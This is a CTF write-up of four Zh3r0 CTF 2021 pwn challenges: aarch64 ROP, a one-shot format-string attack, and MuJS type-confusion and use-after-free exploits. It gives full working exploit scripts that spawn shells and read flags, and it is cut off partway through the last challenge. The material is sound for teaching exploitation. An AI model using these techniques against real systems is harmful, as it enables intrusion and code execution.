Zh3r0 CTF V2 - All Pwnable Writeups

pwn js printf

Last weekend, our team played Zh3r0CTF 2021. As the team's pwn people, we (Day and FizzBuzz101) finished all the tasks and found all of them to be unique and interesting. Here are our writeups for all the pwn challenges.

BabyArmROP (28 solves)

This was basically a ret2libc challenge, but in aarch64. The source was the following:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void vuln() {
    char name_buffer[0x20];
    read(0, name_buffer, 0x1f);
    printf("Hello, %s\n; send me your message now: ", name_buffer);
    fflush(stdout);
    read(0, name_buffer, 0x200);
}

int main() {
    printf("Enter your name: ");
    fflush(stdout);
    vuln();
    return 0;
}

There was no canary, but PIE was on. Also, the given qemu usermode binary had working ASLR for emulated binaries, and for some reason, I could not find a way to disable it. Additionally, in qemu usermode, the only debugging option is with -g, which waits for a gdb connection to port upon binary start; though pwndbg's "vmmap" command can sort of map out memory with auxv and register content exploration, it still does not give us the complete picture for the binary's PIE addressses for us to break at. Our solution ended up being just to first connect gdb to the emulated process, and then read /proc/<qemu pid>/maps to get the emulated process's memory mappings from the emulator.

Now, our first goal is to get a PIE leak. Lucky for us, the buffer for name wasn't zeroed out initially, and there always seemed to be a PIE address in the second qword. With a PIE leak, the rest of the exploit should follow a standard ret2libc procedure, with the only difference being that aarch64 gadgets are really nasty, especially in regards to control flow. Arguments are passed via x0 to x7, the blr instruction stores the return address (instruction + 4) in x30 (link register) before calling the address in the specified register, and the ret instruction returns back to the address stored in the x30 register. Another important thing to notice is how in the end of every function, we have a ldp x29, x30, [sp], #offset; ret;, which basically means load [sp] into x29 (the equivalent of the frame pointer), [sp + 8] into x30, and then add offset to the stack pointer, while at the start, we see a stp x29, x30, [sp, #-offset]!, which means store x29 at [sp+offset], x30 at [sp+offset+8], and then set sp to sp + offset.

In the end, I decided to use the following gadgets in the binary for a libc leak (printf(something@GOT)):

I also found a nice gadget in libc:

We can use the first gadget to load x19 with 0 and x20 with 1 (the reason for this will become clear soon). Load x21 with the got entry for printf, and the same for x22. x23, x24, and x29 don't matter, and we can set x30 to go the next gadget.

When it goes to the next gadget, it will load x3 with [printf@got + 0 * 8], effectively giving it printf's address. Since x19 is still 0, the add instruction will effectively increment it, and printf@got from w22 (thankfully even with ASLR on, the addresses still fit within 32 bits) will move into w0, allowing the next blr x3 to be equivalent to printf(printf@got). Then the following comparison will return equal, causing it to not branch and allowing us to control where it returns too. Since stdout is not set to unbuffered mode, we will need a fflush call, and thankfully, main offers that.

After redirecting to main and hitting the vuln function (with libc leak), the libc gadget makes it trivially easy to open a shell with system("/bin/sh").

Here is the final exploit:

from pwn import *

elf = ELF('./vuln')
libc = ELF('./libc.so.6')

p = remote('pwn.zh3r0.cf', 1111)

def wait():
    p.recvrepeat(0.1)

gadget0 = 0x920
gadget1 = 0x900
gadget2 = 0x6288c

wait()
p.send('A' * 0x8)
p.recvuntil('Hello, ' + 'A' * 0x8)
temp = u64(p.recv(4).ljust(8, '\x00'))
elf.address = temp - 0x8a8
log.info('pie leak: 0x%x' % elf.address)
wait()
payload = (
    p64(elf.address + gadget0) 
    + 'A' * 8 + p64(elf.address + gadget1) # x29 and x30
    + p64(0) + p64(1) # make x19 0 and x20 1 (to fix the cmp that comes after the blr x3)
    + p64(elf.got['printf']) + p64(elf.got['printf']) # set x21 to printf@got, x22 to printf@got
    + p64(0x1337) + p64(0x1337) # padding
    + 'A' * 8 + p64(elf.symbols['main'])
    )
assert(len('A' * 0x28 + payload) < 0x200)
p.send('A' * 0x28 + payload)
leek = u64(p.recv(4).ljust(8, '\x00'))
libc.address = leek - libc.symbols['printf']
log.info('libc leak: 0x%x' % libc.address)
wait()
p.send('A')
wait()
payload = (
    p64(libc.address + gadget2) 
    + 'A' * 8 + p64(libc.symbols['system'])
    + p64(0) + p64(libc.search('/bin/sh').next())
    )
p.send('A' * 0x28 + payload)
p.interactive()

And challenge solved!

[+] Opening connection to pwn.zh3r0.cf on port 1111: Done
[*] pie leak: 0x42175000
[*] libc leak: 0x61b3000
[*] Switching to interactive mode
Hello, A\x841�
; send me your message now: $ cat /vuln/flag
zh3r0{b4by_aaarch64_r0p_f04_fun_4nd_pr0fit}

More Printf (7 solves)

Uh oh, I'm still traumatized by still-printf from hxp ctf 😠. People say heap note is "bad" and "not fun", but have they seen format string challenges???

Anyways, looking at source:

/* gcc -o more-printf -fstack-protector-all more-printf.c */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

FILE *fp;
char *buffer;
uint64_t i = 0x8d9e7e558877;

_Noreturn main() {
  /* Just to save some of your time */
  uint64_t *p;
  p = &p;

  /* Chall */
  setbuf(stdin, 0);
  buffer = (char *)malloc(0x20 + 1);
  fp = fopen("/dev/null", "wb");
  fgets(buffer, 0x1f, stdin);
  if (i != 0x8d9e7e558877) {
    _exit(1337);
  } else {
    i = 1337;
    fprintf(fp, buffer);
    _exit(1);
  }
}

Effectively, our payload must be 0x1e in length, and _exit is called immediately afterwards. There's also an 8 byte cookie to check if you have ran this already or not. Given the length restriction, good luck getting redirection back to main.

However, do note the existence of a self pointer, and the call chain that will happen from main, or more specially main -> __fprintf -> _vfprintf_internal. With some simple debugging, we know the fmtstr offset for the self pointer will be 5. Most likely, the end goal will be to change the self pointer to where the return pointer is stored for either __fprintf or __vfprintf_internal, and since it is impossible for us to leak anything, we have to one shot it to a one gadget.

In order to oneshot this, there are two very important things we must know about printf. First, when something of the %offset$specifier notation is encountered, the value is cached in args_value in printf_positional so it will not reference the stack upon the next encounter. Second, according to the printf manpages. We see the following statement in regards to field width:

       An optional decimal digit string (with nonzero first digit)
       specifying a minimum field width.  If the converted value has
       fewer characters than the field width, it will be padded with
       spaces on the left (or right, if the left-adjustment flag has
       been given).  Instead of a decimal digit string one may write "*"
       or "*m$" (for some decimal integer m) to specify that the field
       width is given in the next argument, or in the m-th argument,
       respectively, which must be of type int.  A negative field width
       is taken as a '-' flag followed by a positive field width.  In no
       case does a nonexistent or small field width cause truncation of
       a field; if the result of a conversion is wider than the field
       width, the field is expanded to contain the conversion result.

Basically, with the notaion of %*offsetc we can write out the amount of bytes specified in the value at the offset. Looking up the stack, we see that we have __libc_start_main addresses at an offset of 8 in regards to the format string. This means that if we choose to target __vfprintf_internal's return address (as it's return address will be into the libc __fprintf, while __fprintf's return will be into a PIE address), we can actually overwrite it with the low 4 bytes of __libc_start_main and get a return into libc without any leaks. By adding the offset to a one gadget (debugging showed that the one at 0x4f3d5 works), we can one shot to a shell, with the condition that the address of the one_gadget during runtime can be seen as a positive number when its lower 4 bytes is treated as a signed 32 bit integer (otherwise, a final %n won't write the correct value). While this probability should be 1/2, in practice, it seemed to be worse.

The only thing that remains to be done is in regards to how to modify the self-pointer to point to __vfprintf_internal's return address. Debugging showed a distance of 0xe8, and since the stack grows downwards and the self-pointer always had the lowest nibble at 0, we must have the self-pointer's least significant byte be 0xf0. Otherwise, the second byte will also differ, which would drastically lower bound the bruteforce to 1/8192 (we originally had a script like this and ended up breaking the challenge instance because we bruteforced too hard). With the above precondition, this becomes a 4 bit brute (as stack addresses only remain constant in the lowest nibble), lower bounding the overall probability of success to 1/32. I had to use %c to print out contents before reaching the self-pointer in order to allow me to write the tiny value of 0x08 without going past the length restriction.

Here's the final exploit:

from pwn import *

elf = ELF('./more-printf')
libc = ELF('./libc.so.6')

p = remote('pwn.zh3r0.cf', 2222)

def wait():
    p.recvrepeat(0.1)
forced_stack_nibble = 0x08
payload_one = '%c%c%c%' + str(forced_stack_nibble - 3) + 'c%hhn%*8$c%' + str(0x4f3d5 - 0x21bf7-0x8) + 'c%5$n'
wait()
p.sendline(payload_one)
p.interactive()

A shell popped up quite quickly:

[+] Opening connection to pwn.zh3r0.cf on port 2222: Done
%c%c%c%5c%hhn%*8$c%186326c%5$n
30
[*] Switching to interactive mode
$ ls
flag
ld-2.27.so
libc.so.6
more-printf
more-printf.c
run.sh
ynetd
$ cat flag
zh3r0{5aeb93e42479d5ee0795bda6e533df0e}

Javascript for Dummies Part 1 (7 solves)

This was a javascript exploitation challenge based on a lightweight javascript interpreter called MuJS. The implementation we were given for the challenge had new code for ArrayBuffer objects and TypedArray objects - Uint8Array, Uint16Array and Uint32Array.

Vulnerability

The ArrayBuffer code takes a size, checks it is not less than or equal to 0, and then increments it until it is a multiple of four. It uses js_malloc to get enough memory for the size, and then stores the pointer to the memory as the backing store and the length of it in bytes.

When you create any of the TypedArrays using a size, it does a similar thing, however multiplying the size by 2 or 4 in the case of UInt16Array and UInt32Array.

However, creating a TypedArray from an ArrayBuffer is where the vuln is. In Uint16Arrays,

oid js_newUint16Array(js_State *J) 
{
    int top = js_gettop(J);
    size_t size;
    if(top != 2) {
        js_typeerror(J, "Expecting Size");    
    }
    if(js_isobject(J, 1)) {
        js_Object* j = js_toobject(J, 1);
        if(j->type != JS_CARRAYBUFFER) {
            js_typeerror(J, "Require ArrayBuffer as Object");
        } else {
            js_Object* this = jsV_newobject(J, JS_CUINT16ARRAY, J->Uint16Array_prototype);
            this->u.ta.mem = j->u.ab.backingStore;
            this->u.ta.length = j->u.ab.byteLength;
            js_pushobject(J,this);
            return ;
        }
    } else {
        size = js_tonumber(J, 1);
        if(size <= 0 && size > UINT32_MAX) {
            js_typeerror(J, "Invalid Length");
        }
        js_Object *this = jsV_newobject(J, JS_CUINT16ARRAY, J->Uint16Array_prototype);
        this->u.ta.mem = js_malloc(J, (size * sizeof(uint16_t)));
        memset((void*)this->u.ta.mem,0,size);
        this->u.ta.length = size;
        js_pushobject(J, this);
    }
}

Mainly, the vuln is in this block

 if(js_isobject(J, 1)) {
        js_Object* j = js_toobject(J, 1);
        if(j->type != JS_CARRAYBUFFER) {
            js_typeerror(J, "Require ArrayBuffer as Object");
        } else {
            js_Object* this = jsV_newobject(J, JS_CUINT16ARRAY, J->Uint16Array_prototype);
            this->u.ta.mem = j->u.ab.backingStore;
            this->u.ta.length = j->u.ab.byteLength;
            js_pushobject(J,this);
            return ;
        }
    }

When creating a Uint16Array from an ArrayBuffer, the byte length of the buffer is copied to the length of the typed array. This is bad, because a length in bytes is different to a length in uint16s. A uint16 array of length 2 is really 4 bytes, so by doing this->u.ta.length = j->u.ab.byteLength; it gives the user access to twice as much data as they should be able to. This gives OOB.

TypedArrays have a fill method which fills the array with a given number, an Includes method which finds the first index of which a number is in the array, and a set method that sets a value in the array.

Background on MuJS

This challenge runs the mujs binary with libjemalloc on LD_PRELOAD. jemalloc is a slab like allocator, meaning that allocations of the same size are adjacent to each other. All objects in mujs are 0x68 in size, so if we make a buffer with a backing store of similar size then our buffer will be in the same slab as objects.

enum js_Class {
	JS_COBJECT,
	JS_CARRAY,
	JS_CFUNCTION,
	JS_CSCRIPT, /* function created from global/eval code */
	JS_CCFUNCTION, /* built-in function */
	JS_CERROR,
	JS_CBOOLEAN,
	JS_CNUMBER,
	JS_CSTRING,
	JS_CREGEXP,
	JS_CDATE,
	JS_CMATH,
	JS_CJSON,
	JS_CARGUMENTS,
	JS_CITERATOR,
	JS_CUSERDATA,
	JS_CUINT8ARRAY,
	JS_CUINT16ARRAY,
	JS_CUINT32ARRAY,
	
	JS_CARRAYBUFFER
};
struct js_ArrayBuffer
{
	uint8_t *backingStore;
	size_t byteLength;
};

struct js_TypedArray
{
	uint8_t* mem;
	size_t length;
	uint8_t type;
};
struct js_Object
{
	enum js_Class type;
	int extensible;
	js_Property *properties;
	int count; /* number of properties, for array sparseness check */
	js_Object *prototype;
	union {
		int boolean;
		double number;
		struct {
			const char *string;
			int length;
		} s;
		struct {
			int length;
		} a;
		struct {
			js_Function *function;
			js_Environment *scope;
		} f;
		struct {
			const char *name;
			js_CFunction function;
			js_CFunction constructor;
			int length;
		} c;
		js_Regexp r;
		struct {
			js_Object *target;
			js_Iterator *head;
		} iter;
		struct {
			const char *tag;
			void *data;
			js_HasProperty has;
			js_Put put;
			js_Delete delete;
			js_Finalize finalize;
		} user;
		js_ArrayBuffer ab;
		js_TypedArray ta;
	} u;
	js_Object *gcnext; /* allocation list */
	js_Object *gcroot; /* scan list */
	int gcmark;
};

Leaking

We can use the OOB to change the type field of an adjacent object. The easiest thing to do is change the type of a TypedArray to JS_CNUMBER. This means that the mem field of the js_TypedArray struct is confused with a double, since they would be in the same position in the union. The prototype of the object will be different to that than of the Number object, so we will have to manually add the functions to its properties. The functions will succeed because the type checks will pass.

buf = new ArrayBuffer(0x64) // 0x64, is in the same area as js objects
arr = new Uint16Array(buf)
buf2 = new ArrayBuffer(0x64)
second_arr = new Uint16Array(buf)
// 100 byte bof, enough to break into the TypedArray arr from buf
// From there we can change arr into any object we please.
// Change into numebr to leak heap address, as the number value gets confused with buffer address
arr.set(56,7)
arr.valueOf = Number.prototype.valueOf

There's no float arrays, so it is difficult to convert between floats and integers. However, I found an old code snippet that is capable of doing so. https://stackoverflow.com/questions/25942516/double-to-byte-array-conversion-in-javascript

Using this, we can convert the memory address stored in a TypedArray from a double and leak a heap address. This is invaluable.

So, I used this oob to switch a Uint16Array into a Number for leaking. I then used second_arr to switch it back to a TypedArray, but this time a Uint32Array instead. This multiplied the amount of oob by 3.

Now, it is possible to change the length field of the TypedArray to a larger number for potentially unlimited overflow.

Gaining Primitives

Next is getting arbitrary read. We can accomplish this by manipulating a string object.

buf = new ArrayBuffer(97) // 0x61, is in the same area as js objects
arr = new Uint16Array(buf)
buf2 = new ArrayBuffer(97)
controlstring = new String("pwn")
second_arr = new Uint16Array(buf)
// 97 byte bof, enough to break into the TypedArray arr from buf
// From there we can change arr into any object we please.
// Change into numebr to leak heap address, as the number value gets confused with buffer address
arr.set(56,7)
arr.valueOf = Number.prototype.valueOf
jrs = new JRS()
// arr is a number - leak heap address
heap_ptr = parseInt(jrs.doubleToHexString(arr.valueOf(),64),16)
second_arr.set(56,0x12)
// arr is now Uint32Array
arr.set = Uint32Array.prototype.set
arr.set(38,1000)

In a string object, there are two fields - a pointer to the null-terminated string data, and the length of the string. By overwriting this pointer to a given address, data can be arbitrarily read via reading characters from the string. However, due to WTF encoding, MuJS won't let us read non-ascii bytes from a string. This is fixed by calling encodeURI on the string, which URL encodes the bytes. I made a custom function to read a number from a string by URI encoding it. For example, "\xd0\x41\xa0" would become "%D0A%A0"

function set64(idx, number){ // Write 64 bit number
    hex = number.toString(16)
    hex = '0'*(16 - hex.length) + hex
    lower = parseInt(hex.slice(-8),16)
    higher = parseInt(hex.slice(0,-8),16)
    arr.set(idx, lower)
    arr.set(idx + 1, higher)
}
function readptr(s){
    out = ""
    // Reads ptr from string
    encoded = encodeURI(s)
    i = 0;
    while(i < encoded.length){
        if(encoded[i] == "%"){
            // Non ascii
            out = encoded.slice(i+1,i+3) + out
            i += 3
        }
        else{
            // Ascii
            out = encoded.charCodeAt(i).toString(16) + out
            i += 1
        }
    }
    return parseInt(out,16)
}

Here is how our slab would look(offsets from backing store from buf where our oob is)

-0x70 - buf ArrayBuffer
0x0 - backing store for buf
0x70 - arr Uint16Array
0xe0 - buf2 ArrayBuffer
0x150 - backing store for buf2
0x1c0 - controlstring

Before the union of object data, there is 32 bytes. This means that the offset between the backing store for buf and the pointer in controlstring is 0x1c0 + 0x20 = 0x1e0 bytes. 0x1e0 / 4 gives an index in uint32array of 120. This allows us to build a function for arbitrary read.

function read(addr){
    set64(120, addr) // set controlstring address to addr
    return readptr(controlstring)
}

Final Exploitation

After gaining arbitrary read, leaking binary and libc is easier. In MuJS, object properties are stored in a tree. Objects have a properties field that points to one of its properties. Each property works like so

struct js_Property
{
	const char *name;
	js_Property *left, *right;
	int level;
	int atts;
	js_Value value;
	js_Object *getter;
	js_Object *setter;
};

It contains a pointer to its name, and pointers to the properties "left" and "right" of it, as well as different metadata and the pointer to the property as a js_value. The leaves of this tree - the edges, such as the left of the first property and the right of the last one - are always a property structure called the sentinel. The sentinel is stored inside the binary, giving a leak to the code base. When an object has no properties, its properties pointer is just to the sentinel.

This allows us to leak easily, given we have a heap leak. arr has properties since we had to manually add functions, however buf2 has no properties. The properties field is 8 bytes after the beginning of an object, so reading 0xe8 bytes after the heap leak we got(which gives the address of our oob buffer) will leak the sentinel, which can be offsetted to leak the code base.

Afterwards, we can use the Global Offset Table(GOT) given our arbitrary read to leak a heap address. memset causes local vs remote problems, so I used fopen.

// Leak sentinel property to get binary base
binarybase = read(heap_ptr + 0xe8) - 0x460a0
print("Binary Base: 0x" + binarybase.toString(16))
// Use GOT to leak libc(I did fopen)
libcbase = read(binarybase + 0x45f58) - 0x85a90

After this, the only question is how to pop a shell. There are various methods, I took advantage of the userdata structure. In MuJS, the userdata objects are ways of representing arbitrary data from C in mujs, which can be manipulated through the C api. Because of this, userdata objects have a little more control. I learned from this writeup that when trying to add a property to a user data object, obj.u.user.put(J, obj->u.user.data, name) is called. the u.user structure in objects looks like this

struct {
			const char *tag;
			void *data;
			js_HasProperty has;
			js_Put put;
			js_Delete delete;
			js_Finalize finalize;
		} user;

The OOB control we have now gained can be used to change a pre-existing object into a custom userdata object we have complete control over. This can give us arbitrary code execution, however limited in arguments.

However, I ran one_gadget on the libc, and found a useful gadget at 0xe6e79 that required

rsi == NULL || [rsi] == NULL
rdx == NULL || [rdx] == NULL

This ignores rdi, so the fact that obj.u.user.put will be called with J(the environment currently being worked in) as the first argument was fine. With control over the object fields, the data pointer can be set to a null pointer, satisfying the check for rsi. name would be a pointer to the string representing the property that should be added - meaning, we had to make sure this pointer was a pointer to NULL. I was able to do this by trying to set a property that was just empty string, such as obj[""] = 0xdeadbeef. Due to null turmination, this would ensure [rdx] == NULL.

So, the exploit steps

The connect.py script which handles the server closes stdout and stderr before running mujs on our exploit script. This can be bypassed by reopening stdout with exec 1>&0, from which commands can be run to read the flag file and get the flag

Full Exploit

JRS = function(){
    function numberToBinString(number, binStringLength) {
        var A = [], T = null; // number>=0
        while (binStringLength--) {
            T = number % 2;
            A[binStringLength] = T;
            number -= T;
            number /= 2;
        }
        return A.join("");
    }

    function HexFn(fourBitsBinString) {
        return parseInt(fourBitsBinString, 2).toString(16);
    }

    function binStringToHexString(binString) {
        return binString.replace(/(\d{4})/g, HexFn );
    }

    function hexStringToBinString(hexString) {
        var binString = "";

        for(var i=0; i< hexString.length-1; i+=2) {
            binString += numberToBinString(parseInt(hexString.substr(i, 2), 16), 8);
        }

        return binString;    
    }

    function SngFwd(Sg, Ex, Mt) {
        var B = {};
        Mt = Math.pow(2, 23) * Mt + 0.5; // round
        B.a = 0xFF & Mt;
        B.b = 0xFF & (Mt >> 8);
        B.c = 0x7F & (Mt >> 16) | (Ex & 1) << 7;
        B.d = Sg << 7 | (Ex >> 1);
        return B;
    }

    function DblFwd(Sg, Ex, Mt) {
        var B = {};
        Mt = Math.pow(2, 52) * Mt;
        B.a = 0xFFFF & Mt;
        B.b = 0xFFFF & (Mt >> 16);
        Mt /= Math.pow(2, 32); // Integers are only 32-bit
        B.c = 0xFFFF & Mt;
        B.d = Sg << 15 | Ex << 4 | 0x000F & (Mt >> 16);
        return B;
    }

    function CVTFWD(NumW, Qty) { // Function now without side-effects
        var Sign = null, Expo = null, Mant = null, Bin = null, nb01 = ""; // , OutW = NumW/4
        var Inf = {
            32 : {d: 0x7F, c: 0x80, b: 0, a : 0},
            64 : {d: 0x7FF0, c: 0, b: 0, a : 0}
        };
        var ExW = {32: 8, 64: 11}[NumW], MtW = NumW - ExW - 1;

        if (isNaN(Qty)) {
            Bin = Inf[NumW];
            Bin.a = 1;
            Sign = false;
            Expo = Math.pow(2, ExW) - 1;
            Mant = Math.pow(2, -MtW);
        }

        if (!Bin) {
            Sign = Qty < 0 || 1 / Qty < 0; // OK for +-0
            if (!isFinite(Qty)) {
                Bin = Inf[NumW];
                if (Sign)
                    Bin.d += 1 << (NumW / 4 - 1);
                Expo = Math.pow(2, ExW) - 1;
                Mant = 0;
            }
        }

        if (!Bin) {
            Expo = {32: 127, 64: 1023}[NumW];
            Mant = Math.abs(Qty);
            while (Mant >= 2) {
                Expo++;
                Mant /= 2;
            }
            while (Mant < 1 && Expo > 0) {
                Expo--;
                Mant *= 2;
            }
            if (Expo <= 0) {
                Mant /= 2;
                nb01 = "Zero or Denormal";
            }
            if (NumW == 32 && Expo > 254) {
                nb01 = "Too big for Single";
                Bin = {
                    d : Sign ? 0xFF : 0x7F,
                    c : 0x80,
                    b : 0,
                    a : 0
                };
                Expo = Math.pow(2, ExW) - 1;
                Mant = 0;
            }
        }

        if (!Bin)
            Bin = {32: SngFwd, 64: DblFwd}[NumW](Sign, Expo, Mant);

        Bin.sgn = +Sign;
        Bin.exp = numberToBinString(Expo, ExW);
        Mant = (Mant % 1) * Math.pow(2, MtW);
        if (NumW == 32)
            Mant = Math.floor(Mant + 0.5);
        Bin.mnt = numberToBinString(Mant, MtW);
        Bin.nb01 = nb01;
        return Bin;
    }

    function CVTREV(BinStr) {
        var ExW = {32: 8,64: 11}[BinStr.length];
        var M = BinStr.match(new RegExp("^(.)(.{" + ExW + "})(.*)$"));
        // M1 sign, M2 exponent, M3 mantissa

        var Sign = M[1] == "1" ? -1 : +1;

        if (!/0/.test(M[2])) { // NaN or Inf
            var X = /1/.test(M[3]) ? NaN : Sign / 0;
            throw new Error("Max Coded " + M[3] + " " + X.toString());
        }

        var Denorm = +M[2] == 0;
        if (Denorm) {
            console.log("Zero or Denormal");
        }

        var Expo = parseInt(M[2], 2) - Math.pow(2, ExW - 1) + 1;
        var Mant = parseInt(M[3], 2) / Math.pow(2, M[3].length) + !Denorm;
        return Sign * Mant * Math.pow(2, Expo + Denorm);
    }

    this.doubleToHexString = function( /* double */d, /* int */size) {
        var NumW = size;
        var Qty = d;
        with (CVTFWD(NumW, Qty)) {
            return binStringToHexString(sgn + exp + mnt);
        }
    };

    this.hexStringToDouble = function (/*String*/hexString, /*int*/size) {
        var NumW = size ;
        var binString = hexStringToBinString(hexString) ;
        var X = new RegExp("^[01]{" + NumW + "}$");
        if (!X.test(binString)) {
            alert(NumW + " bits 0/1 needed");
            return;
        }
        return CVTREV(binString);
    };
};
buf = new ArrayBuffer(97) // 0x61, is in the same area as js objects
arr = new Uint16Array(buf)
buf2 = new ArrayBuffer(97)
controlstring = new String("pwn")
second_arr = new Uint16Array(buf)
// 97 byte bof, enough to break into the TypedArray arr from buf
// From there we can change arr into any object we please.
// Change into number to leak heap address, as the number value gets confused with buffer address
arr.set(56,7)
arr.valueOf = Number.prototype.valueOf
jrs = new JRS()
// arr is a number - leak heap address
heap_ptr = parseInt(jrs.doubleToHexString(arr.valueOf(),64),16)
second_arr.set(56,0x12)
// arr is now Uint32Array
arr.set = Uint32Array.prototype.set
arr.set(38,1000)
arr.set(0,0xdeadbeef)
// controlstring can now be controlled for arb read
function set64(idx, number){ // Write 64 bit number
    hex = number.toString(16)
    hex = '0'*(16 - hex.length) + hex
    lower = parseInt(hex.slice(-8),16)
    higher = parseInt(hex.slice(0,-8),16)
    arr.set(idx, lower)
    arr.set(idx + 1, higher)
}
function readptr(s){
    out = ""
    // Reads ptr from string
    encoded = encodeURI(s)
    i = 0;
    while(i < encoded.length){
        if(encoded[i] == "%"){
            // Non ascii
            out = encoded.slice(i+1,i+3) + out
            i += 3
        }
        else{
            // Ascii
            out = encoded.charCodeAt(i).toString(16) + out
            i += 1
        }
    }
    return parseInt(out,16)
}

function read(addr){
    set64(120, addr) // set controlstring address to addr
    return readptr(controlstring)
}
// Leak sentinel property to get binary base
binarybase = read(heap_ptr + 0xe8) - 0x460a0
print("Binary Base: 0x" + binarybase.toString(16))
// Use GOT to leak libc(I did fopen)
libcbase = read(binarybase + 0x45f58) - 0x85a90
print("Libc Base: 0x" + libcbase.toString(16))
print("One gadget: 0x" + (libcbase + 0xe6e79).toString(16))
// Change buf2 into userdata
set64(56,0x000000010000000f) // set type to userdata
set64(64,0) // tag
set64(66,0) // data
set64(70,libcbase + 0xe6e79) // change put to one gadget
// obj->u.user.put(J, obj->u.user.data, name)
// one gadget requires rsi to be 0 or a pointer to 0 and rdx to be 0 or a pointer to 0
// Setting obj->u.user.data to 0 fixes that for rsi, to fix rdx we make the attribute that we try to set be empty string
buf2[""] = 0

Running on remote gives us a flag!

exec 1>&0
ls
connect.py
flag_ea9cb51550cf5f04aa29dd5fbf71593a
libjemalloc.so.2
mujs
run.sh
start.sh
ynetd
cat flag_ea9cb51550cf5f04aa29dd5fbf71593a
zh3r0{9107cb3f05e7b5d1c7a149f38c8ff4a0}

Javascript for Dummies Part 2 (6 solves)

Vulnerability

Now, only the UInt32Array remains, and the TypedArray struct no longer has the type field.

struct js_TypedArray
{
    uint8_t* mem;
    size_t length;
};

In addition to .fill, .set, and .Includes, we also have .at, .get, .find, and .reverse. Due to the adjustment in available objects, the enums for js_Class had to change as well:

enum js_Class {
    JS_COBJECT,
    JS_CARRAY,
    JS_CFUNCTION,
    JS_CSCRIPT, /* function created from global/eval code */
    JS_CCFUNCTION, /* built-in function */
    JS_CERROR,
    JS_CBOOLEAN,
    JS_CNUMBER,
    JS_CSTRING,
    JS_CREGEXP,
    JS_CDATE,
    JS_CMATH,
    JS_CJSON,
    JS_CARGUMENTS,
    JS_CITERATOR,
    JS_CUSERDATA,
    JS_CUINT32ARRAY,
    JS_CARRAYBUFFER
};

Also, when running a diff, we noticed that jsgc.c has implemented functionality for garbage collection UInt32Arrays.

static void jsG_freeobject(js_State *J, js_Object *obj)
{
    if (obj->properties->level)
        jsG_freeproperty(J, obj->properties);
    if (obj->type == JS_CREGEXP) {
        js_free(J, obj->u.r.source);
        js_regfreex(J->alloc, J->actx, obj->u.r.prog);
    }
    if (obj->type == JS_CITERATOR)
        jsG_freeiterator(J, obj->u.iter.head);
    if (obj->type == JS_CUSERDATA && obj->u.user.finalize)
        obj->u.user.finalize(J, obj->u.user.data);
    if( obj->type == JS_CUINT32ARRAY ) {
        js_free(J, (void*)obj->u.ta.mem);
    }
    js_free(J, obj);
}

Note how you can create UInt32Array from ArrayBuffer, and they will share the same buffer pointer. This leads to a UAF when garbage collection happens and frees UInt32Array's buffer, while active ArrayBuffers still have their backing pointer there.

Reading MuJS documentation, we note that it's garbage collector is a mark and sweep style garbage collector. This means reachable objects are marked, and then unreachable ones will be swept (freed). People usually trigger gc in Chromium v8 exploits with the following:

function gc() 
{
    for (let i = 0; i < 100; i++)
    {
        new ArrayBuffer(0x100000);
    }
}

With this as our basis, we pretty quickly managed to get the interpreter to hit piebase+0x7a10, which is where the js_gc function runs, with the following:

function gc(a, b)
{
    for (i = 0; i < a; i++)
    {
        c = new Uint32Array(b);
    }
}

gc(10000, 2)

The following should trigger a rudimentary double free now:

function gc(a, b, buf)
{
    c = new Uint32Array(buf);
    for (i = 0; i < a; i++)
    {
        c = new Uint32Array(b);
    }
}

buf = new ArrayBuffer(2);
gc(10000, 2, buf);
gc(10000, 2, buf);

When preloaded to use the glibc allocator, we see an obvious abort from a double free check. However, that does not happen with jemalloc, which would actually make exploitation easier as it is not as harsh with checks for at least this part.

Exploitation

Our exploitation plan should be the following: Create an ArrayBuffer, and trigger the gc to free a UInt32Array constructed with the same buffer to get a dangling UAF. Then, like any allocator, we can keep re-allocating until we have an overlap of our buffer over a UInt32Array object. An overlap is quite easy to detect thanks to how ArrayBuffer memsets its buffer to 0 upon initialization:

void js_newArrayBuffer(js_State* J) 
{
    int top = js_gettop(J);
    size_t size;
    if(top != 2) {
        js_typeerror(
            J,
            "Expecting Byte length"
        );
    }
    size = js_tonumber(J, 1);
    if(size <= 0) {
        js_typeerror(
            J,
            "Invalid byte length"
        );
    }
    while((size%4)) {
        size += 1;
    }
    js_Object* this = jsV_newobject(J, JS_CARRAYBUFFER, J->ArrayBuffer_prototype);
    this->u.ab.backingStore = js_malloc(J, (size));
    memset((void*)this->u.ab.backingStore, 0, size);
    this->u.ab.byteLength = size;
    js_pushobject(J, this);
}

The following code should get us overlap:

function gc(a, b, buf)
{
    for (i = 0; i < a; i++)
    {
        new Uint32Array(b);
    }
    new Uint32Array(buf);
}

arraybuf = new ArrayBuffer(97);
arr = Uint32Array(arraybuf);
gc(10000, 2, arraybuf); // cause this to become a dangling pointer for UAF
while (true)
{
    target = new Uint32Array(200);
    if (arr.get(0) != 0)
    {
        print("found overlap!");
        break;
    }
}

Now, we can easily index into arr and change the data for target. Take careful note of the js_Object struct from the previous part. Attaching to the process with a debugger, we immediately noticed how the propety pointer allowed us to rebase the binary PIE addresses. A heap leak can also be obtained by reading the mem pointer in the TypedArray union field of the object struct. We can then change the mem pointer to __libc_start_main@got to leak libc, and then change the mem pointer to environ for stack leak.

// TypedArray items are in union after prototype, prototype at index 6 and 7
piebase = parseInt(arr.get(3).toString(16) + arr.get(2).toString(16), 16) - 278688
print('pie base: 0x' + piebase.toString(16))
heapleak = parseInt(arr.get(7).toString(16) + arr.get(6).toString(16), 16)
print('heap leak: 0x' + heapleak.toString(16))
main_got = piebase + 0x43fd8

print('__libc_start_main@got: 0x' + main_got.toString(16))

low = parseInt(main_got.toString(16).substring(4, 12), 16)
high = parseInt(main_got.toString(16).substring(0, 4), 16)

original = parseInt(arr.get(9).toString(16) + arr.get(8).toString(16), 16)

arr.set(8, low)
arr.set(9, high)
libcbase = parseInt(target.get(1).toString(16) + target.get(0).toString(16), 16) - 0x26fc0
print('libc base: 0x' + libcbase.toString(16))
environ = libcbase + 0x1ef2e0
low = parseInt(environ.toString(16).substring(4, 12), 16)
high = parseInt(environ.toString(16).substring(0, 4), 16)
arr.set(8, low)
arr.set(9, high)
stack = parseInt(target.get(1).toString(16) + target.get(0).toString(16), 16) - 0x26fc0
print('stack leak: 0x' + stack.toString(16))

Looking at the main function for the interpreter:

int
main(int argc, char **argv)
{
    char *input;
    js_State *J;
    int status = 0;
    int strict = 0;
    int interactive = 0;
    int i, c;

